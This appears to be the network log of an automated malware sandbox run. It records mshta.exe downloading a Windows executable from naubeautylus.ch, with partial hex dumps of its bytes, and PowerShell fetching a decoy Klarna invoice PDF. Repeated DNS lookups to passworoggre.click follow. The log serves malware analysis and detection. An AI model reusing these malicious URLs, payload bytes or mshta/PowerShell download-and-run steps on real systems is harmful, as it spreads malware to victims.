                                                                                                              Dec 16, 2024 09:14:24.653892040 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.653918982 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.653950930 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.720104933 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.720127106 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.720169067 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.720179081 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.720204115 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.720227957 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.783453941 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.783499002 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.783524990 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.783531904 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.783564091 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.783581972 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.784411907 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.784471035 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.784476995 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.784554005 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:24.784603119 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:24.785032034 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:15:25.418895006 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:25.418983936 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:25.421943903 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:25.425703049 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:25.425787926 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:26.646226883 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:26.646413088 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:26.647877932 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:26.647933960 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:26.648407936 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:26.690584898 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:26.696150064 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:26.696150064 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:26.696564913 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.711503983 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.711802006 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.712006092 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.713849068 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.713948965 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.714008093 CET49815443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.714026928 CET44349815104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.774691105 CET49820443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.774789095 CET44349820104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:27.774964094 CET49820443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.775219917 CET49820443192.168.2.4104.21.59.81
                                                                                                              Dec 16, 2024 09:15:27.775259972 CET44349820104.21.59.81192.168.2.4
                                                                                                              Dec 16, 2024 09:15:29.050364971 CET49820443192.168.2.4104.21.59.81
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 16, 2024 09:14:09.518446922 CET5479953192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:14:10.398065090 CET53547991.1.1.1192.168.2.4
                                                                                                              Dec 16, 2024 09:14:32.009738922 CET6261853192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:14:47.361742973 CET5002953192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:15:25.085546017 CET5817953192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:15:25.407677889 CET53581791.1.1.1192.168.2.4
                                                                                                              Dec 16, 2024 09:15:47.691102028 CET6258253192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:15:47.828866005 CET53625821.1.1.1192.168.2.4
                                                                                                              Dec 16, 2024 09:16:11.784785986 CET6224753192.168.2.41.1.1.1
                                                                                                              Dec 16, 2024 09:16:11.960937977 CET53622471.1.1.1192.168.2.4
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 16, 2024 09:14:09.518446922 CET192.168.2.41.1.1.10x32a1Standard query (0)naubeautylus.chA (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:14:32.009738922 CET192.168.2.41.1.1.10x3d07Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:14:47.361742973 CET192.168.2.41.1.1.10x6252Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:25.085546017 CET192.168.2.41.1.1.10xef62Standard query (0)passworoggre.clickA (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:47.691102028 CET192.168.2.41.1.1.10xae48Standard query (0)passworoggre.clickA (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:16:11.784785986 CET192.168.2.41.1.1.10xc634Standard query (0)passworoggre.clickA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 16, 2024 09:14:10.398065090 CET1.1.1.1192.168.2.40x32a1No error (0)naubeautylus.ch62.182.21.105A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:14:32.225039959 CET1.1.1.1192.168.2.40x3d07No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:14:47.500118017 CET1.1.1.1192.168.2.40x6252No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:25.407677889 CET1.1.1.1192.168.2.40xef62No error (0)passworoggre.click104.21.59.81A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:25.407677889 CET1.1.1.1192.168.2.40xef62No error (0)passworoggre.click172.67.219.27A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:47.828866005 CET1.1.1.1192.168.2.40xae48No error (0)passworoggre.click172.67.219.27A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:15:47.828866005 CET1.1.1.1192.168.2.40xae48No error (0)passworoggre.click104.21.59.81A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:16:11.960937977 CET1.1.1.1192.168.2.40xc634No error (0)passworoggre.click104.21.59.81A (IP address)IN (0x0001)false
                                                                                                              Dec 16, 2024 09:16:11.960937977 CET1.1.1.1192.168.2.40xc634No error (0)passworoggre.click172.67.219.27A (IP address)IN (0x0001)false
                                                                                                              • naubeautylus.ch
                                                                                                              • passworoggre.click
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.44973062.182.21.1054436960C:\Windows\System32\mshta.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-16 08:14:11 UTC333OUTGET /Headerfrontend HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              UA-CPU: AMD64
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: naubeautylus.ch
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-16 08:14:12 UTC364INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              last-modified: Sun, 15 Dec 2024 12:39:53 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 462414
                                                                                                              date: Mon, 16 Dec 2024 08:14:12 GMT
                                                                                                              server: LiteSpeed
                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: cc cc cc 8b ff 55 8b ec 51 8b 45 08 53 56 8b f1 57 89 86 a4 00 00 00 8b 45 0c 89 86 a8 00 00 00 ff 15 94 21 41 00 ff 75 18 8b 86 a4 00 00 00 33 db 53 53 53 ff 70 04 8b ce ff 15 a4 21 41 00 8b f8 85 ff 0f 88 ce 00 00 00 6a 01 8b ce ff 15 94 20 41 00 8b f8 85 ff 0f 88 ba 00 00 00 6a 01 8b ce ff 15 98 20 41 00 8b f8 85 ff 0f 88 a6 00 00 00 8b 8e a4 00 00 00 56 ff 15 48 21 41 00 6a 01 8b ce ff 15 24 21 41 00 8d 45 fc 50 ff 15 bc 20 41 00 8b f8 85 ff 78 7f ff 75 fc 8b ce ff 15 9c 20 41 00 8b f8 85 ff 79 0b 8b 4d fc ff 15 c0 20 41 00 eb 63 6a 10 bf 05 40 00 80 e8 c3 9c 00 00 8b d0 59 85 d2 74 14 8b 8e a4 00 00 00 8b 49 04 89 5a 04 89 5a 08 89 4a 0c eb 02 8b d3 89 96 ac 00 00 00 85 d2 74 30 53 8d 45 fc 8b ca 50 0f b7 45 10 53 56 68 90 16 40 00 50 ff b6 a8 00 00
                                                                                                              Data Ascii: UQESVWE!Au3SSSp!Aj Aj AVH!Aj$!AEP Axu AyM Acj@YtIZZJt0SEPESVh@P
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 10 6a 2d 59 e8 3e de ff ff ff b5 dc fd ff ff ff 15 6c 22 41 00 83 f8 ff 74 37 6a 0e 68 e8 21 40 00 8b cb e8 72 04 00 00 ff b5 dc fd ff ff ff 15 68 22 41 00 a1 38 10 41 00 3b c7 74 14 f6 40 1c 10 74 0e ff 70 14 ff 70 10 6a 2e 59 e8 f6 dd ff ff 8b 8d dc fd ff ff 33 ff 8d 49 f0 e8 6a b4 ff ff 8b 8d d8 fd ff ff 8d 49 f0 e8 5c b4 ff ff 8b 8d d4 fd ff ff 8d 49 f0 e8 4e b4 ff ff 83 bd c4 fd ff ff 00 74 0c ff b5 c4 fd ff ff ff 15 64 20 41 00 8d 4e f0 e8 31 b4 ff ff 8d 8d ac fd ff ff e8 b7 05 00 00 8b c7 e8 06 6b 00 00 c2 0c 00 cc cc cc cc cc cc 6a 00 b8 ac fd 40 00 e8 1b 6b 00 00 8b 45 08 85 c0 74 38 8b 00 ba 08 22 40 00 66 8b 30 33 c9 41 66 3b 32 75 1e 66 85 f6 74 15 66 8b 70 02 66 3b 72 02 75 0f 83 c0 04 83 c2 04 66 85 f6 75 db 33 c0 eb 04 1b c0 0b c1 85 c0 74
                                                                                                              Data Ascii: j-Y>l"At7jh!@rh"A8A;t@tppj.Y3IjI\INtd AN1kj@kEt8"@f03Af;2uftfpf;rufu3t
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: dd 85 c0 fe ff ff dc 4d b0 de c1 d9 18 d9 85 1c ff ff ff d9 58 04 d9 85 18 ff ff ff d9 58 08 d9 85 14 ff ff ff d9 58 0c d9 85 10 ff ff ff d9 58 10 d9 85 0c ff ff ff d9 58 14 d9 85 08 ff ff ff d9 58 18 d9 85 e0 fe ff ff d9 58 1c d9 85 04 ff ff ff d9 58 20 d9 85 00 ff ff ff d9 58 24 d9 85 fc fe ff ff d9 58 28 d9 85 f8 fe ff ff d9 58 2c d9 85 f4 fe ff ff d9 58 30 d9 85 f0 fe ff ff d9 58 34 d9 85 ec fe ff ff d9 58 38 d9 85 e4 fe ff ff d9 58 3c d9 85 e8 fe ff ff d9 58 40 d9 85 d0 fe ff ff d9 58 44 d9 85 d4 fe ff ff d9 58 48 d9 85 d8 fe ff ff d9 58 4c d9 85 dc fe ff ff d9 58 50 d9 45 f4 d9 58 54 d9 45 ec d9 58 58 d9 45 e4 d9 58 5c d9 45 fc d9 58 60 c9 c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 60 d9 42 04 d8 05 44 16 41 00 8b 45 08 d9 5d fc d9 42 08 d8 05
                                                                                                              Data Ascii: MXXXXXXXX X$X(X,X0X4X8X<X@XDXHXLXPEXTEXXEX\EX`U`BDAE]B
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 40 1c 41 00 40 16 40 00 48 16 40 00 38 10 41 00 00 00 00 00 84 28 40 00 32 00 00 00 33 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 9c 28 40 00 42 00 00 00 43 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 b8 28 40 00 36 00 00 00 37 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 cc 28 40 00 40 00 00 00 41 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 e4 28 40 00 3a 00 00 00 3b 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 fc 28 40 00 34 00 00 00 35 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 14 29 40 00 10 20 00 00 11 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 38 29 40 00 0e 20 00 00 0f 20 00 00 01 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: @A@@H@8A(@23(@BC(@67(@@A0(@:;(@45)@ 8)@
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 4d 00 55 00 49 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 10 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: MUIen-US
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 68 ff ff ff e8 dd 02 00 00 8b 45 1c 8b 8d dc fe ff ff 89 85 3c ff ff ff 8d 85 2c ff ff ff 50 89 9d 40 ff ff ff 89 b5 44 ff ff ff 89 9d 48 ff ff ff e8 b0 02 00 00 8b 45 14 89 85 1c ff ff ff 89 9d 20 ff ff ff 89 b5 24 ff ff ff 89 9d 28 ff ff ff 8b 45 10 89 9d 10 ff ff ff c7 85 14 ff ff ff 08 00 00 00 89 9d 18 ff ff ff 8b 00 89 85 0c ff ff ff 8d 85 ec fe ff ff 50 6a 11 53 53 ff b5 d8 fe ff ff ff b5 d4 fe ff ff e8 a3 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 65 b0 00 00 c9 c2 44 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 60 01 00 00 a1 04 13 41 00 33 c5 89 45 fc 8b 45 18 89 85 a8 fe ff ff 8b 45 20 89 85 ac fe ff ff 8b 45 28 53 8b 5d 3c 89 85 b0 fe ff ff 8b 45 30 56 8b 75 48 89 85 b4 fe ff ff 8b 45 38 57 8b 7d 44 89 85 b8 fe ff ff 8d 45 ec 89 8d a0 fe ff ff 8b 4d 54
                                                                                                              Data Ascii: hE<,P@DHE $(EPjSSM_^3[eDU`A3EEE E(S]<E0VuHE8W}DEMT
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: f0 e8 b1 cc ff ff 8d 57 48 c6 45 fc 01 8d 4d f0 e8 50 02 00 00 8b ce ba 20 14 41 00 f7 d9 1b c9 81 c1 02 00 00 80 85 f6 75 05 ba a0 13 41 00 8b 75 f0 56 68 58 13 41 00 e8 4f fe ff ff 8d 4e f0 c6 45 fc 00 e8 82 c4 ff ff 8b 75 e8 85 f6 74 42 68 78 12 41 00 8d 4d f0 e8 5a cc ff ff c6 45 fc 02 84 db 74 03 83 c7 18 8b d7 8d 4d f0 e8 f3 01 00 00 8b 75 f0 ba 20 14 41 00 56 68 84 13 41 00 b9 01 00 00 80 e8 02 fe ff ff 8d 4e f0 e8 39 c4 ff ff 8b 75 ec 8d 4d e0 e8 f0 24 00 00 8b c6 e8 f4 7a 00 00 c3 cc cc cc cc cc cc 6a 1c b8 eb fb 40 00 e8 25 7b 00 00 8b f9 33 db 8d 4d e4 53 68 90 1f 40 00 89 5d ec e8 79 24 00 00 89 5d fc 89 5d d8 89 5d dc 89 5d e0 8d 4d f0 c6 45 fc 01 e8 53 67 00 00 68 06 00 02 00 8d 4d d8 ff 30 68 02 00 00 80 e8 53 e8 ff ff 8b 4d f0 8b f0 83 c1
                                                                                                              Data Ascii: WHEMP AuAuVhXAONEutBhxAMZEtMu AVhAN9uM$zj@%{3MSh@]y$]]]]MESghM0hSM
                                                                                                              2024-12-16 08:14:12 UTC16384INData Raw: 3b d0 74 10 66 89 3a 03 d7 3b d0 75 f7 8b 56 10 85 d2 74 60 85 db 8b fa 8b 5d 08 74 2c 0f b7 46 14 6b c8 2c 03 ca 3b d1 74 1f 8b 7e 0c 83 c2 08 39 7a fc 76 07 8b 02 3b 43 08 74 38 83 c2 2c 8d 42 f8 3b c1 75 ea 8b 7e 10 0f b7 46 16 33 d2 0f b7 4e 14 40 f7 f1 0f b7 c2 33 d2 6b c8 2c 42 66 89 46 16 8b 46 08 03 cf f0 0f c1 10 42 52 53 e8 b4 fd ff ff 5f 5e 5b 5d c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 53 56 8b 35 ec 1c 41 00 33 db 57 8b fb 85 f6 74 51 39 5e 04 75 1c 8b 0e 8d 55 fc 89 5d fc e8 87 15 00 00 85 c0 78 0b 39 5e 04 75 06 8b 45 fc 89 46 04 8b 76 04 8d 46 10 f7 de 1b f6 23 f0 74 22 ff 15 e0 22 41 00 6a 0a 59 33 d2 8b f8 f7 f1 8b 4c 96 08 eb 07 39 39 74 10 8b 49 04 85 c9 75 f5 8b fb 8b c7 5f 5e 5b c9 c3 83 c1 08 8b f9 74 f2 39 59 08 75 ed 8d 46 04
                                                                                                              Data Ascii: ;tf:;uVt`]t,Fk,;t~9zv;Ct8,B;u~F3N@3k,BfFFBRS_^[]UQSV5A3WtQ9^uU]x9^uEFvF#t""AjY3L99tIu_^[t9YuF
                                                                                                              2024-12-16 08:14:13 UTC16384INData Raw: 04 41 00 e9 46 fb ff ff cc cc cc cc cc cc 8d 4d f0 e9 15 4c ff ff 8d 4d ec e9 0d 4c ff ff 8d 4d d4 e9 6d 69 ff ff 8d 4d e0 e9 fd 4b ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a cc 33 c8 e8 ba f0 ff ff b8 ac 04 41 00 e9 fe fa ff ff cc cc cc cc cc cc 8d 8d d4 fd ff ff e9 2c a5 ff ff 8d 8d e8 fd ff ff e9 2c 85 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a d0 fd ff ff 33 c8 e8 79 f0 ff ff 8b 4a fc 33 c8 e8 6f f0 ff ff b8 f0 04 41 00 e9 b3 fa ff ff cc cc cc cc cc cc 8d 4d f0 e9 ef 84 ff ff 8d 4d ec e9 e7 84 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 7c ff ff ff 33 c8 e8 34 f0 ff ff b8 24 05 41 00 e9 78 fa ff ff cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 11 f0 ff ff b8 74 02 41 00 e9 55 fa ff ff cc cc cc cc cc cc
                                                                                                              Data Ascii: AFMLMLMmiMKT$BJ3A,,T$B3yJ3oAMMT$B|34$AxT$BJ3tAU


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.44973462.182.21.1054431344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-16 08:14:16 UTC87OUTGET /KlarnaInvoice42611.pdf HTTP/1.1
                                                                                                              Host: naubeautylus.ch
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-16 08:14:17 UTC217INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              content-type: application/pdf
                                                                                                              last-modified: Sun, 15 Dec 2024 02:49:07 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 114905
                                                                                                              date: Mon, 16 Dec 2024 08:14:16 GMT
                                                                                                              server: LiteSpeed
                                                                                                              2024-12-16 08:14:17 UTC1151INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 38 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 34 36 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 34 37 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 31 35 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e
                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>endobj3 0 obj<</Type/Page/Paren
                                                                                                              2024-12-16 08:14:17 UTC14994INData Raw: e9 6a 1d f6 c0 4c d1 ec 69 60 aa 06 f6 90 d1 46 8e 3d 8d 4b f0 f2 ec 69 b3 f5 14 4c 05 3c d9 dd e0 f1 75 b3 60 a8 14 18 aa 49 dc 95 0c 95 5d c8 50 f9 a6 64 39 1f 47 43 75 0c 12 f8 08 86 aa 67 8d e4 8c 8f 0f 63 04 48 aa 73 9a 36 25 1c f0 16 5d 7c f1 65 9c b6 6a 2b 07 a9 34 aa 72 99 35 fe ea 97 e3 78 5c 6c cb 38 5a 70 ca a8 11 7e b6 a0 22 68 16 70 f6 08 c2 9a 31 f6 ac f8 dc 9c a4 89 a5 b9 e9 96 9a 9b d5 56 e7 04 3d 3a 54 2a 39 0c 97 1f 77 6e c4 bb 38 61 e1 1f fa 10 eb 78 0f d1 79 36 14 8d 0b 4c df 22 0e 9a ea 6a a7 7b 66 f7 0c df 70 02 4a 49 2a cb 14 be 4b ca e2 17 52 16 57 95 b4 77 54 59 4e e0 8f 85 cd 7c a3 40 4b ca c4 c9 6b 49 19 47 ef 94 01 6d 95 da a9 45 6b ba 3a 1d 92 37 5d 65 7a e4 4d d7 24 f9 96 b4 b1 96 ce 65 68 70 f6 21 c8 6d 98 f3 23 cc 4f 63 44
                                                                                                              Data Ascii: jLi`F=KiL<u`I]Pd9GCugcHs6%]|ej+4r5x\l8Zp~"hp1V=:T*9wn8axy6L"j{fpJI*KRWwTYN|@KkIGmEk:7]ezM$ehp!m#OcD
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: 26 bc 71 f6 5c 55 f1 28 5d 71 fa f2 38 76 ec 78 f1 28 bd 0c 27 4e 7c 2b 7b 2f dd b7 ef bc 35 69 52 f6 5e fa fa 07 d2 d3 d8 b0 71 e3 c8 fd af b3 f7 52 51 59 99 3d 9a 36 6d fa 82 85 0b 87 86 86 b3 f7 92 5e 32 83 b9 a3 74 2f 33 67 7e 9c 7d 8c e9 5e de ff e0 83 ec d1 a6 4d 9b 27 4d 9a 94 be ba b2 f7 92 1e 63 f6 28 bd 5e d2 95 7d db bd b4 e4 ef 65 fc f8 f1 75 17 33 f7 92 fe 30 3d fc b3 e7 32 af 97 a6 e6 e6 89 6f bd 75 34 77 2f e9 a5 94 9e 70 f6 5e da 3b 3a 27 4f 99 92 bd 97 3b 77 7b de 7b ef fd f5 b9 d7 4b 7a 44 53 a7 4e ad a8 5c 95 fe 69 ca de cb a2 45 8b 06 87 32 ff b6 a4 7b 99 3f 7f 7e ff c0 40 f1 48 32 4c 01 00 10 da a3 31 4c 2d 5e bc 64 f5 9a 35 c5 a3 f4 d3 df ca 95 15 cb 97 af c8 be e1 c6 8d 1b 17 2c 58 98 3d da be e3 f3 39 73 e7 66 8f f6 ee fb a2 a4 b4
                                                                                                              Data Ascii: &q\U(]q8vx('N|+{/5iR^qRQY=6m^2t/3g~}^M'Mc(^}eu30=2ou4w/p^;:'O;w{{KzDSN\iE2{?~@H2L1L-^d5,X=9sf
                                                                                                              2024-12-16 08:14:17 UTC16384INData Raw: bd e6 e1 53 5e 77 e5 d1 47 14 7d 2d a3 10 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 b3 54 98 7a 83 30 65 8c 31 c6 18 63 4c 9b cc 88 61 ea 15 c2 d4 ff 42 98 02 c8 59 23 4c f5 7d e5 1d c3 3f b6 2a ff f2 0f d1 ca bb aa e5 95 e9 a9 c5 51 d1 cf e6 41 71 b5 37 b9 9e e8 de a3 a3 a5 e7 ee 76 91 01 66 c7 fc e8 ee e7 47 ab 3e 1a 7e f3 a6 5f 44 77 1f 59 5d f7 8d e0 9b a3 35 9f 8f e6 be b0 ba e9 57 a1 37 af 88 96 5f 14 dd fb 92 ea 8e 05 81 37 97 96 47 8b ff 39 ba ff 75 e1 5f e4 d2 d2 68 fe 1b a2 87 fe 31 fc e6 de 85 d1 dc 69 d1 ca 4b 82 6f 8e 36 ff 36 ba
